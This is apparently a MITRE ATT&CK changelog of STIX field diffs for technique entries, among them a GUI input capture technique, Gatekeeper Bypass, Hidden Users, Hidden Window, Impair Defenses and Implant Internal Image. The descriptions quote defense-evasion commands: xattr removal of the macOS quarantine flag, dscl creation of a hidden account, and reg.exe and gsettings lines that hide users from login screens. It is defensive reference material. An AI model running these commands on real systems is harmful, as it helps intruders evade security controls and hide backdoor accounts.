descriptionAdversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
x_mitre_version1.11.2

[T1553.001] Subvert Trust Controls: Gatekeeper Bypass

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may modify file attributes that signify programst1Adversaries may modify file attributes and subvert Gatekeepe
> are from untrusted sources to subvert Gatekeeper controls i>r functionality to evade user prompts and execute untrusted 
>n macOS. When documents, applications, or programs are downl>programs. Gatekeeper is a set of technologies that act as la
>oaded an extended attribute (xattr) called <code>com.apple.q>yer of Apple’s security model to ensure only trusted applica
>uarantine</code> can be set on the file by the application p>tions are executed on a host. Gatekeeper was built on top of
>erforming the download. This attribute, also known as a quar> File Quarantine in Snow Leopard (10.6, 2009) and has grown 
>antine flag, is read by Apple's Gatekeeper defense program w>to include Code Signing, security policy compliance, Notariz
>hen the file is run and provides a prompt to the user to all>ation, and more. Gatekeeper also treats applications running
>ow or deny execution. Gatekeeper also monitors an applicatio> for the first time differently than reopened applications.(
>n's usage of dynamic libraries (dylibs) loaded outside the a>Citation: TheEclecticLightCompany Quarantine and the flag)(C
>pplication folder on any quarantined binary, often using the>itation: TheEclecticLightCompany apple notarization )  Based
> <code>dlopen</code> function. If the quarantine flag is set> on an opt-in system, when files are downloaded an extended 
> in macOS 10.15+, Gatekeeper also checks for a notarization >attribute (xattr) called `com.apple.quarantine` (also known 
>ticket and sends a cryptographic hash to Apple's servers to >as a quarantine flag) can be set on the file by the applicat
>check for validity for all unsigned executables.(Citation: T>ion performing the download. Launch Services opens the appli
>heEclecticLightCompany apple notarization )(Citation: Bypass>cation in a suspended state. For first run applications with
>ing Gatekeeper)  The quarantine flag is an opt-in system and> the quarantine flag set, Gatekeeper executes the following 
> not imposed by macOS. If an application opts-in, a file dow>functions:  1. Checks extended attribute – Gatekeeper checks
>nloaded from the Internet will be given a quarantine flag be> for the quarantine flag, then provides an alert prompt to t
>fore being saved to disk. Any application or user with write>he user to allow or deny execution.(Citation: OceanLotus for
> permissions to the file can change or strip the quarantine > OS X)(Citation: 20 macOS Common Tools and Techniques)  2. C
>flag. With elevated permission (sudo), this attribute can be>hecks System Policies - Gatekeeper checks the system securit
> removed from any file. The presence of the <code>com.apple.>y policy, allowing execution of apps downloaded from either 
>quarantine</code> quarantine flag can be checked with the xa>just the App Store or the App Store and identified developer
>ttr command <code>xattr -l /path/to/examplefile</code>. Simi>s.  3. Code Signing – Gatekeeper checks for a valid code sig
>larly, this attribute can be recursively removed from all fi>nature from an Apple Developer ID.  4. Notarization - Using 
>les in a folder using xattr, <code>sudo xattr -d com.apple.q>the `api.apple-cloudkit.com` API, Gatekeeper reaches out to 
>uarantine /path/to/folder</code>.(Citation: 20 macOS Common >Apple servers to verify or pull down the notarization ticket
>Tools and Techniques)(Citation: TheEclecticLightCompany Quar> and ensure the ticket is not revoked. Users can override no
>antine and the flag)(Citation: theevilbit gatekeeper bypass >tarization, which will result in a prompt of executing an “u
>2021)  Apps and files loaded onto the system from a USB flas>nauthorized app” and the security policy will be modified.  
>h drive, optical disk, external hard drive, from a drive sha>Adversaries can subvert one or multiple security controls wi
>red over the local network, or using the <code>curl</code> c>thin Gatekeeper checks through logic errors (e.g. [Exploitat
>ommand do not set this flag. Additionally, it is possible to>ion for Defense Evasion](https://attack.mitre.org/techniques
> avoid setting this flag using [Drive-by Compromise](https:/>/T1211)), unchecked file types, and external libraries. For 
>/attack.mitre.org/techniques/T1189), which may bypass Gateke>example, prior to macOS 13 Ventura, code signing and notariz
>eper. (Citation: Methods of Mac Malware Persistence)(Citatio>ation checks were only conducted on first launch, allowing a
>n: Clearing quarantine attribute)(Citation: OceanLotus for O>dversaries to write malicious executables to previously open
>S X)>ed applications in order to bypass Gatekeeper security check
 >s.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Ap
 >plication Bundle Manipulation Brandon Dalton)  Applications 
 >and files loaded onto the system from a USB flash drive, opt
 >ical disk, external hard drive, from a drive shared over the
 > local network, or using the curl command may not set the qu
 >arantine flag. Additionally, it is possible to avoid setting
 > the quarantine flag using [Drive-by Compromise](https://att
 >ack.mitre.org/techniques/T1189).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Brandon Dalton @PartyD0lphin', 'Swasti Bhushan Deb, IBM India Pvt. Ltd.']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 21:18:30.629000+00:002022-10-21 19:30:58.414000+00:00
descriptionAdversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
external_references[1]['source_name']TheEclecticLightCompany apple notarization Application Bundle Manipulation Brandon Dalton
external_references[1]['description']How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.
external_references[1]['url']https://eclecticlight.co/2020/08/28/how-notarization-works/https://redcanary.com/blog/mac-application-bundles/
external_references[2]['source_name']Bypassing Gatekeepertheevilbit gatekeeper bypass 2021
external_references[2]['description']Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.
external_references[2]['url']https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/
external_references[3]['source_name']20 macOS Common Tools and TechniquesOceanLotus for OS X
external_references[3]['description']Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.
external_references[3]['url']https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update
external_references[5]['source_name']theevilbit gatekeeper bypass 2021TheEclecticLightCompany apple notarization
external_references[5]['description']Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.
external_references[5]['url']https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/https://eclecticlight.co/2020/08/28/how-notarization-works/
external_references[6]['source_name']Methods of Mac Malware Persistence20 macOS Common Tools and Techniques
external_references[6]['description']Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[6]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
x_mitre_data_sources[1]File: File ModificationProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationFile: File Modification
x_mitre_defense_bypassed[0]Application controlAnti-virus
x_mitre_defense_bypassed[1]Anti-virusApplication Control
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Clearing quarantine attribute', 'description': 'Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.', 'url': 'https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/'}
external_references{'source_name': 'OceanLotus for OS X', 'description': 'Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.', 'url': 'https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update'}

[T1564.002] Hide Artifacts: Hidden Users

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use hidden users to mask the presence of uset1Adversaries may use hidden users to hide the presence of use
>r accounts they create or modify. Normal users may want to h>r accounts they create or modify. Administrators may want to
>ide users when there are many users accounts on a given syst> hide users when there are many user accounts on a given sys
>em or want to keep an account hidden from the other users on>tem or if they want to hide their administrative or other ma
> the system.  In macOS, every user account has a userID asso>nagement accounts from other users.   In macOS, adversaries 
>ciated with it. When creating a user, you can specify the us>can create or modify a user to be hidden through manipulatin
>erID for that account. There is a property value in <code>/L>g plist files, folder attributes, and user attributes. To pr
>ibrary/Preferences/com.apple.loginwindow</code> called <code>event a user from being shown on the login screen and in Sys
>>Hide500Users</code> that prevents users with userIDs 500 an>tem Preferences, adversaries can set the userID to be under 
>d lower from appearing at the login screen. When using the [>500 and set the key value <code>Hide500Users</code> to <code
>Create Account](https://attack.mitre.org/techniques/T1136) t>>TRUE</code> in the <code>/Library/Preferences/com.apple.log
>echnique with a userID under 500 (ex: <code>sudo dscl . -cre>inwindow</code> plist file.(Citation: Cybereason OSX Pirrit)
>ate /Users/username UniqueID 401</code>) and enabling this p> Every user has a userID associated with it. When the <code>
>roperty (setting it to Yes), an adversary can conceal user a>Hide500Users</code> key value is set to <code>TRUE</code>, u
>ccounts. (Citation: Cybereason OSX Pirrit)  In Windows, adve>sers with a userID under 500 do not appear on the login scre
>rsaries may hide user accounts via settings in the Registry.>en and in System Preferences. Using the command line, advers
> For example, an adversary may add a value to the Windows Re>aries can use the <code>dscl</code> utility to create hidden
>gistry (via [Reg](https://attack.mitre.org/software/S0075) o> user accounts by setting the <code>IsHidden</code> attribut
>r other means) that will hide the user “test” from the Windo>e to <code>1</code>. Adversaries can also hide a user’s home
>ws login screen: <code>reg.exe ADD 'HKLM\SOFTWARE\Microsoft\> folder by changing the <code>chflags</code> to hidden.(Cita
>Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' >tion: Apple Support Hide a User Account)   Adversaries may s
>/v test /t REG_DWORD /d 0 /f</code>.(Citation: FireEye SMOKE>imilarly hide user accounts in Windows. Adversaries can set 
>DHAM June 2021)(Citation: US-CERT TA18-074A)>the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
 >Winlogon\SpecialAccounts\UserList</code> Registry key value 
 >to <code>0</code> for a specific user to prevent that user f
 >rom being listed on the logon screen.(Citation: FireEye SMOK
 >EDHAM June 2021)(Citation: US-CERT TA18-074A)  On Linux syst
 >ems, adversaries may hide user accounts from the login scree
 >n, also referred to as the greeter. The method an adversary 
 >may use depends on which Display Manager the distribution is
 > currently using. For example, on an Ubuntu system using the
 > GNOME Display Manger (GDM), accounts may be hidden from the
 > greeter using the <code>gsettings</code> command (ex: <code
 >>sudo -u gdm gsettings set org.gnome.login-screen disable-us
 >er-list true</code>).(Citation: Hide GDM User Accounts) Disp
 >lay Managers are not anchored to specific distributions and 
 >may be changed by a user or adversary.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['root', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 20:22:03.625000+00:002022-04-19 02:31:01.315000+00:00
descriptionAdversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system. In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit) In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account) Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A) On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.
external_references[1]['description']Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020.Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.
external_references[1]['url']http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdfhttps://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
external_references[2]['source_name']FireEye SMOKEDHAM June 2021Apple Support Hide a User Account
external_references[2]['description']FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.htmlhttps://support.apple.com/en-us/HT203998
external_references[3]['source_name']US-CERT TA18-074AFireEye SMOKEDHAM June 2021
external_references[3]['description']US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.
external_references[3]['url']https://www.us-cert.gov/ncas/alerts/TA18-074Ahttps://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
x_mitre_data_sources[0]Command: Command ExecutionFile: File Modification
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationUser Account: User Account Creation
x_mitre_data_sources[3]User Account: User Account CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[5]File: File ModificationCommand: Command Execution
x_mitre_detectionThis technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, "hidden" users may still get a home directory and will appear in the authentication logs. Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList key.Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs. Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList key. In macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the Hide500Users key value to TRUE in the /Library/Preferences/com.apple.loginwindow plist file. Monitor the command line for usage of the dscl . create command with the IsHidden attribute set to 1.(Citation: Apple Support Hide a User Account)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Hide GDM User Accounts', 'description': 'Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.', 'url': 'https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/'}
external_references{'source_name': 'US-CERT TA18-074A', 'description': 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-074A'}
x_mitre_platformsLinux

[T1564.003] Hide Artifacts: Hidden Window

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 22:49:43.557000+00:002022-03-15 21:09:43.489000+00:00
x_mitre_data_sources[0]Process: Process CreationFile: File Modification
x_mitre_data_sources[3]File: File ModificationProcess: Process Creation
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux

[T1574] Hijack Execution Flow

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 23:52:52.536000+00:002022-05-05 04:07:01.191000+00:00
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationFile: File Creation
x_mitre_data_sources[1]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[2]Module: Module LoadFile: File Modification
x_mitre_data_sources[3]Command: Command ExecutionService: Service Metadata
x_mitre_data_sources[4]Service: Service MetadataProcess: Process Creation
x_mitre_data_sources[5]File: File CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]File: File ModificationModule: Module Load
x_mitre_defense_bypassed[1]Application controlApplication Control
x_mitre_version1.11.2

[T1562] Impair Defenses

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 13:37:31.463000+00:002022-10-19 16:32:56.502000+00:00
x_mitre_data_sources[0]Process: Process CreationFirewall: Firewall Disable
x_mitre_data_sources[1]Process: Process TerminationDriver: Driver Load
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[3]Windows Registry: Windows Registry Key DeletionScript: Script Execution
x_mitre_data_sources[4]Command: Command ExecutionCloud Service: Cloud Service Disable
x_mitre_data_sources[5]Service: Service MetadataWindows Registry: Windows Registry Key Deletion
x_mitre_data_sources[7]Script: Script ExecutionWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[8]Firewall: Firewall DisableCommand: Command Execution
x_mitre_data_sources[9]Firewall: Firewall Rule ModificationCloud Service: Cloud Service Modification
x_mitre_data_sources[10]Cloud Service: Cloud Service ModificationService: Service Metadata
x_mitre_data_sources[11]Cloud Service: Cloud Service DisableProcess: Process Termination
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFirewall: Firewall Rule Modification

[T1525] Implant Internal Image

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may implant cloud or container images with malict1Adversaries may implant cloud or container images with malic
>ious code to establish persistence after gaining access to a>ious code to establish persistence after gaining access to a
>n environment. Amazon Web Services (AWS) Amazon Machine Imag>n environment. Amazon Web Services (AWS) Amazon Machine Imag
>es (AMIs), Google Cloud Platform (GCP) Images, and Azure Ima>es (AMIs), Google Cloud Platform (GCP) Images, and Azure Ima
>ges as well as popular container runtimes such as Docker can>ges as well as popular container runtimes such as Docker can
> be implanted or backdoored. Unlike [Upload Malware](https:/> be implanted or backdoored. Unlike [Upload Malware](https:/
>/attack.mitre.org/techniques/T1608/001), this technique focu>/attack.mitre.org/techniques/T1608/001), this technique focu
>ses on adversaries implanting an image in a registry within >ses on adversaries implanting an image in a registry within 
>a victim’s environment. Depending on how the infrastructure >a victim’s environment. Depending on how the infrastructure 
>is provisioned, this could provide persistent access if the >is provisioned, this could provide persistent access if the 
>infrastructure provisioning tool is instructed to always use>infrastructure provisioning tool is instructed to always use
> the latest image.(Citation: Rhino Labs Cloud Image Backdoor> the latest image.(Citation: Rhino Labs Cloud Image Backdoor
> Technique Sept 2019)  A tool has been developed to facilita> Technique Sept 2019)  A tool has been developed to facilita
>te planting backdoors in cloud container images.(Citation: R>te planting backdoors in cloud container images.(Citation: R
>hino Labs Cloud Backdoor September 2019) If an attacker has >hino Labs Cloud Backdoor September 2019) If an adversary has
>access to a compromised AWS instance, and permissions to lis> access to a compromised AWS instance, and permissions to li
>t the available container images, they may implant a backdoo>st the available container images, they may implant a backdo
>r such as a [Web Shell](https://attack.mitre.org/techniques/>or such as a [Web Shell](https://attack.mitre.org/techniques
>T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Techni>/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Techn
>que Sept 2019)>ique Sept 2019)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:28:27.948000+00:002022-03-08 21:27:49.094000+00:00
descriptionAdversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
x_mitre_data_sources[0]Image: Image CreationImage: Image Metadata
